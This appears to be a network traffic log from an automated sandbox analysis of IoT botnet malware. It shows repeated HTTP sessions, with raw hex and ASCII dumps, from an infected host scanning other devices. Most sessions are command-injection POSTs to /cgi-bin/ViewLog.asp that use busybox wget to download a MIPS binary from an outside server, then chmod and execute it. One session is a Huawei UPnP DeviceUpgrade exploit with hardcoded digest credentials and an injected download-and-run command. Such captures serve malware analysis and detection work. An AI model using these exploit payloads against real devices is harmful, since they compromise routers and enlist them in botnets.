                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.304765940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              770192.168.2.143609631.136.15.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.520093918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.120835066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.304771900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              771192.168.2.145021894.46.180.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.533495903 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.292381048 CET401INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 23 Nov 2023 04:18:20 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://192.168.0.14/cgi-bin/ViewLog.asp
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              772192.168.2.143306094.120.175.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.877172947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              773192.168.2.144810431.136.140.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.914087057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.504714012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.656670094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              774192.168.2.1455624154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:20.957528114 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:20Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              775192.168.2.145001294.123.243.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.141918898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              776192.168.2.145574862.150.44.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.163718939 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.447738886 CET167INHTTP/1.1 400 Bad Request
                                              Connection: close
                                              Content-Type: text/plain
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              777192.168.2.145775494.121.23.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.441850901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              778192.168.2.144099031.44.128.748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.445118904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.155617952 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              779192.168.2.1456296106.52.246.19823
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.513797045 CET225INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 39 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:19:24Auth Result: ????.


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              780192.168.2.1455672154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.602781057 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 32 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:20Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              781192.168.2.145577062.150.44.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.693501949 CET167INHTTP/1.1 400 Bad Request
                                              Connection: close
                                              Content-Type: text/plain
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              782192.168.2.144179662.72.166.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.758145094 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              783192.168.2.144948294.120.19.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.952800035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              784192.168.2.145673662.56.134.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.965562105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.688666105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              785192.168.2.1443164156.247.29.2737215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:21.980351925 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              786192.168.2.143318031.136.184.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.169033051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              787192.168.2.144146094.122.204.1878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:22.207524061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
